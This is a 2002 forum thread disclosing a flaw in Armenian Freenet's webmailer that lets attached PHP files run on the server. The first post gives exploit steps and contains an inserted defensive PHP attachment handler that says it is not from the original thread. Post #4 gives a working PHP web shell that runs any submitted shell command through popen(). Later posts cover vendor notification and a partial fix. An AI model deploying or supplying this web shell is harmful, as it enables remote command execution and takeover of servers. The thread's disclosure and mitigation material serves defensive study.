Armenian Knowledge Base  

Old 09.07.2002, 06:49   #1
Conservative
 
Join Date: 01 2002
Location: Caucasian Albania
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Armenian Freenet web based mailer security flaw

Armenian Freenet web based mailer security flaw
(software design bug)

VX Advisory #0002

Originally discovered by Vahram Igityan <[email protected]> @ 20020708

DESCRIPTION
Armenian Freenet is the most popular free mail and hosting server in Armenia,
and its web-based mailer is part of their free service, located at http://email.freenet.am.

OVERVIEW
Users on Armenian Freenet can execute any type of PHP code.

DETAILS
When a user views his/her attachment, it is saved on the server's disk in a unique
directory and fetched by the browser, so if you attach a .php file, it will be parsed
by the server.

EXPLOIT
Write code like <? phpinfo(); ?>, attach it and send it to a freenet account, then open your
inbox using their web based mailer and -=enjoy=-

SOLUTION
Rewrite the attachment viewing part of the code: use a directory outside the DocumentRoot and show
the attachment by opening and dumping the file.
---eof--
__________________
The holiday is coming to us...

|^^^^^^^^^'''^\| ||\__
| VODKA-VODKA | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
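A defensive counterpart to the SOLUTION in the advisory above, added here as an example; it is not code from the original post or from Freenet's mailer. It is a PHP 7.1+ download handler that keeps stored attachments outside the DocumentRoot and dumps them to the client as opaque bytes, so no PHP, CGI or other server handler ever sees them. The directory /var/mail-attachments, the 32-hex attachment id scheme and the function names are assumptions made for this example.

```php
<?php
// Added example, not Freenet's code: serve a mail attachment from a directory
// outside the DocumentRoot, as the advisory's SOLUTION describes.
// Assumed layout: each stored attachment lives at ATTACH_DIR/<32-hex-id>, and the
// mailer looks the id and the original filename up in its own metadata.

// Assumed path; it must be a canonical (non-symlink) path that is NOT under DocumentRoot.
define('ATTACH_DIR', '/var/mail-attachments');

// Map an opaque attachment id to an on-disk path, or null if it is not acceptable.
function attachment_path(string $id): ?string
{
    // Only an opaque id is accepted, never a user-supplied filename or path.
    if (!preg_match('/\A[a-f0-9]{32}\z/', $id)) {
        return null;
    }
    $real = realpath(ATTACH_DIR . '/' . $id);
    // realpath() resolves symlinks and "..", so this confirms the target
    // really is a regular file inside ATTACH_DIR.
    if ($real === false || !is_file($real) || strpos($real, ATTACH_DIR . '/') !== 0) {
        return null;
    }
    return $real;
}

// Build response headers that force a download instead of rendering or executing.
function attachment_headers(string $original_name, int $size): array
{
    // Strip anything that could break the header or smuggle a second filename.
    $safe_name = preg_replace('/[^A-Za-z0-9._-]/', '_', $original_name);
    if ($safe_name === '') {
        $safe_name = 'attachment';
    }
    return [
        'Content-Type: application/octet-stream',
        'X-Content-Type-Options: nosniff',
        'Content-Disposition: attachment; filename="' . $safe_name . '"',
        'Content-Length: ' . $size,
    ];
}

// Stream the attachment to the client. The file is opened and dumped with
// readfile(), so it never passes through the PHP, CGI or any other handler.
function send_attachment(string $id, string $original_name): void
{
    $path = attachment_path($id);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    foreach (attachment_headers($original_name, filesize($path)) as $h) {
        header($h);
    }
    readfile($path);
}

// Usage (id and original name come from the mailer's own attachment metadata,
// not from the request):
// send_attachment($_GET['id'] ?? '', $name_from_metadata);
```

The `<? phpinfo(); ?>` attachment from the EXPLOIT section is the natural regression test for this change: after the rewrite it must arrive as an `application/octet-stream` download containing the literal source, not rendered phpinfo output. Because the file is served by `readfile()` from a directory the web server does not map at all, the same holds for the other types later posts in this thread mention (cgi, asp, .c), and `Content-Disposition: attachment` with `nosniff` keeps the browser from rendering html attachments inline as pages of the mailer's origin.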
Old 09.07.2002, 07:42   #2
Student
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0

lol

I'm just curious whether there is any attachment type that makes sense to show this way (I wouldn't even show html like that)..

Nice discovery!
Old 09.07.2002, 15:23   #3
Schoolboy
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0

LoL
Old 09.07.2002, 16:47   #4
Conservative
 
Join Date: 01 2002
Location: Caucasian Albania
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0

And here is proof-of-concept exploit code ))
Code:
<?
function fo(){
?>
<BODY>
<FORM>
<INPUT TYPE=TEXT NAME=cmd VALUE="ls">
<INPUT TYPE=SUBMIT NAME="ss" VALUE="bb">
</FORM>
</BODY>
<?
}

if (!isset($ss)){
	fo();
}else
{
	echo "<PRE>\n";
	$pi = popen("$cmd","r");
	while ( ! feof($pi))
		print fgets($pi,512);
	pclose($pi);
	echo "</PRE>\n";
}
?>
Old 09.07.2002, 17:15   #5
Student
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0

Nothing else to say!
Nice job! And a really funny one! I bet the fn admin doesn't read this forum, so this thing will stay available for a long time..
Old 09.07.2002, 18:13   #6
Schoolboy
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0

2 VX
Whenever you find a serious thing like this, tell the sysadmin first, otherwise right now there are thousands of users on fn.
Someone loses their conscience and ....

Anyway, well done!!! But be sure to tell the admin first, if of course you haven't already told him
Old 09.07.2002, 18:31   #7
Conservative
 
Join Date: 01 2002
Location: Caucasian Albania
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0

Quote:
Originally posted by strax.:
2 VX
Whenever you find a serious thing like this, tell the sysadmin first, otherwise right now there are thousands of users on fn.
Someone loses their conscience and ....

Anyway, well done!!! But be sure to tell the admin first, if of course you haven't already told him
Vendor was already notified...
But no answer received
Old 09.07.2002, 20:38   #8
Conservative
 
Join Date: 01 2002
Location: Caucasian Albania
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0

Admin replied...
He's a very nice person
Old 10.07.2002, 11:53   #9
Student
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0

Hmm.. I don't know how to put this into words, but this is something..
ANY file that it knows how to run, the mailer runs inside itself; this includes php, cgi (there are small problems with privileges there, but that's nothing), asp and so on..
It's simply a nightmare!

Plus, for unknown reasons it renames files without an extension to file.txt, and in general it works just amazingly

2 VX:
I hope Tigran understood all of this.. He should shut down the web-email entirely until he fixes it, if freenet or his job is dear to him.
__________________
http://www.d-brane.com
Old 10.07.2002, 12:25   #10
Student
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0

2 VX
So Tigran sort of "closed" php, leaving everything else??
An interesting person

By the way, regarding asp, it seems I didn't check properly; apparently it doesn't understand it, but it doesn't show .c files, again apparently it tries to run them itself and doesn't get the privileges (similar to cgi)
Old 10.07.2002, 17:25   #11
Conservative
 
Join Date: 01 2002
Location: Caucasian Albania
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0

YES, that's exactly what he closed
At least now they can't hack it "blatantly"
Old 10.07.2002, 17:57   #12
Schoolboy
 
Join Date: 05 2002
Location: Yerevan
Posts: 202
Downloads: 0
Uploads: 0
Reputation: 0 | 0

VX, why aren't you answering letters?
Get in touch with me somehow...
Old 14.07.2002, 00:11   #13
Moderator
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5

Dzec !!